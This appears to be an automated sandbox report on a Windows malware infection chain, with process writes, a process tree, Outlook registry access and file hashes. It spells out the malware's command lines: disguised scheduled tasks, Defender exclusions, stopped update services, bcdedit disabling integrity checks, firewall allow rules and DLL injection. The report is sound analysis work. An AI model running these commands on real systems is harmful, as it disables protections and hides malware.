PID 1208 wrote to memory of 2040 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8594.exe
PID 1208 wrote to memory of 2040 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8594.exe
PID 1208 wrote to memory of 2040 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8594.exe
PID 1208 wrote to memory of 2040 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8594.exe
PID 1208 wrote to memory of 2040 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8594.exe
PID 1208 wrote to memory of 2040 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8594.exe
PID 1208 wrote to memory of 3048 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8798.exe
PID 1208 wrote to memory of 3048 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8798.exe
PID 1208 wrote to memory of 3048 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8798.exe
PID 1208 wrote to memory of 3048 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8798.exe
PID 2040 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\8594.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe
PID 2040 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\8594.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe
PID 2040 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\8594.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe
PID 2040 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\8594.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe
PID 2040 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\8594.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe
PID 2040 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\8594.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe
PID 2040 wrote to memory of 2976 N/A C:\Users\Admin\AppData\Local\Temp\8594.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe
PID 1208 wrote to memory of 2652 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1208 wrote to memory of 2652 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 1208 wrote to memory of 2652 N/A C:\Windows\Explorer.EXE C:\Windows\system32\cmd.exe
PID 2976 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe
PID 2976 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe
PID 2976 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe
PID 2976 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe
PID 2976 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe
PID 2976 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe
PID 2976 wrote to memory of 2768 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe
PID 1208 wrote to memory of 2404 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8A39.exe
PID 1208 wrote to memory of 2404 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8A39.exe
PID 1208 wrote to memory of 2404 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8A39.exe
PID 1208 wrote to memory of 2404 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8A39.exe
PID 2768 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe
PID 2768 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe
PID 2768 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe
PID 2768 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe
PID 2768 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe
PID 2768 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe
PID 2768 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe
PID 1208 wrote to memory of 2480 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8C8B.exe
PID 1208 wrote to memory of 2480 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8C8B.exe
PID 1208 wrote to memory of 2480 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8C8B.exe
PID 1208 wrote to memory of 2480 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8C8B.exe
PID 2616 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe
PID 2616 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe
PID 2616 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe
PID 2616 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe
PID 2616 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe
PID 2616 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe
PID 2616 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe
PID 2652 wrote to memory of 2152 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2652 wrote to memory of 2152 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2652 wrote to memory of 2152 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2804 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe
PID 2804 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe
PID 2804 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe
PID 2804 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe
PID 2804 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe
PID 2804 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe
PID 2804 wrote to memory of 1040 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe
PID 1208 wrote to memory of 1544 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\934F.exe
PID 1208 wrote to memory of 1544 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\934F.exe
PID 1208 wrote to memory of 1544 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\934F.exe
PID 1208 wrote to memory of 1544 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\934F.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F68A.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1861898231-3446828954-4278112889-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\F68A.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe

"C:\Users\Admin\AppData\Local\Temp\0x0007000000022ce0-53.exe"

C:\Users\Admin\AppData\Local\Temp\8594.exe

C:\Users\Admin\AppData\Local\Temp\8594.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Jh9RQ8vX.exe

C:\Users\Admin\AppData\Local\Temp\8798.exe

C:\Users\Admin\AppData\Local\Temp\8798.exe

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\88D1.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zD4uW1AP.exe

C:\Users\Admin\AppData\Local\Temp\8A39.exe

C:\Users\Admin\AppData\Local\Temp\8A39.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nq0kv0kV.exe

C:\Users\Admin\AppData\Local\Temp\8C8B.exe

C:\Users\Admin\AppData\Local\Temp\8C8B.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\rU1Pv1yO.exe

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1iH26Lb2.exe

C:\Users\Admin\AppData\Local\Temp\934F.exe

C:\Users\Admin\AppData\Local\Temp\934F.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2152 CREDAT:275457 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\9968.exe

C:\Users\Admin\AppData\Local\Temp\9968.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 268

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Vd594oN.exe

C:\Users\Admin\AppData\Local\Temp\B5BF.exe

C:\Users\Admin\AppData\Local\Temp\B5BF.exe

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2152 CREDAT:275461 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\C682.exe

C:\Users\Admin\AppData\Local\Temp\C682.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\kos4.exe

"C:\Users\Admin\AppData\Local\Temp\kos4.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\DFED.exe

C:\Users\Admin\AppData\Local\Temp\DFED.exe

C:\Users\Admin\AppData\Local\Temp\EC8B.exe

C:\Users\Admin\AppData\Local\Temp\EC8B.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2940 -s 520

C:\Users\Admin\AppData\Local\Temp\F68A.exe

C:\Users\Admin\AppData\Local\Temp\F68A.exe

C:\Users\Admin\AppData\Local\Temp\FB7B.exe

C:\Users\Admin\AppData\Local\Temp\FB7B.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231031031256.log C:\Windows\Logs\CBS\CbsPersist_20231031031256.cab

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {B91DC3BB-9B04-418A-A2F9-8068AD5EF48F} S-1-5-21-1861898231-3446828954-4278112889-1000:PTZSFKIF\Admin:Interactive:[1]

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\system32\taskeng.exe

taskeng.exe {085A3BA4-4FCB-4F92-80B0-39E70D6FAC80} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

Network


Files


C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6e68805f0661dbeb776db896761d469f
SHA1 95e550b2f54e9167ae02f67e963703c593833845
SHA256 095e2b0ed70525cf5a7a5c31241aad5c27964fd69d68569c646a158c0ff50b47
SHA512 5cf25502b2fc8ab34b777b490493c8974af15135e8ff81f43ff254b910f74ee5cece6848ca4a5adae54b8cbf895362f268fd1665705f39bee27f395ea5c04efc

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 89c82822be2e2bf37b5d80d575ef2ec8
SHA1 9fe2fad2faff04ad5e8d035b98676dedd5817eca
SHA256 6fea30b9d17eacffde43b727058b5b2c422a7b70407534549042ba7b20d5f8c9
SHA512 142ca76bc32cc60c11f640bd9e050df6000b6824a192595416f661d22d6e52704dfd369974d7f2f73d01eaa356237c50778737d72d5588c5a2ff8a8010ee8101

\Users\Admin\AppData\Local\Temp\kos4.exe

MD5 01707599b37b1216e43e84ae1f0d8c03
SHA1 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2
SHA256 cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd
SHA512 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642

\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 89c82822be2e2bf37b5d80d575ef2ec8
SHA1 9fe2fad2faff04ad5e8d035b98676dedd5817eca
SHA256 6fea30b9d17eacffde43b727058b5b2c422a7b70407534549042ba7b20d5f8c9
